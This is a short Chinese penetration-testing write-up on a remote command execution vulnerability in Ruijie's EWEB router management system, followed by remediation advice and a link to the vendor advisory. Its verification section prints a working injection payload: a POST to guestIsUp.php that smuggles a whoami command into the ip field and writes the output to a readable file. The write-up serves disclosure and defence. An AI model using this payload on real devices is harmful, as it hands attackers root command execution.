锐捷EWEB网管系统远程命令执行漏洞

前言

持续更新：整理下渗透测试工作中发现过的漏洞（包含漏洞描述、漏洞等级、漏洞验证、修复建议），这里不深究漏洞产生的各种后利用或者绕过方式，漏洞验证过程不局限于文章中的方法，能够证明漏洞存在即可。

0x01 漏洞描述

- 锐捷EWEB网管系统远程命令执行 -

锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。

锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权限。

0x02 漏洞等级

0x03 漏洞验证

访问锐捷EWEB网管系统界面，使用BurpSuite工具抓取数据包。

使用POST型数据包检测语句执行whoami命令，并将执行结果保存到test.txt中。

POST /guest_auth/guestIsUp.php

Content-Type: application/x-www-form-urlencoded

mac=1&ip=127.0.0.1|whoami > test.txt

访问/guest_auth/test.txt文件，获取当前服务器用户权限为ROOT

0x04 漏洞修复

1. 对设备进行系统升级，限定内外网访问设备WEB页面（管理员除外）。
2. 厂商已发布了漏洞修复程序，请及时关注更新：https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/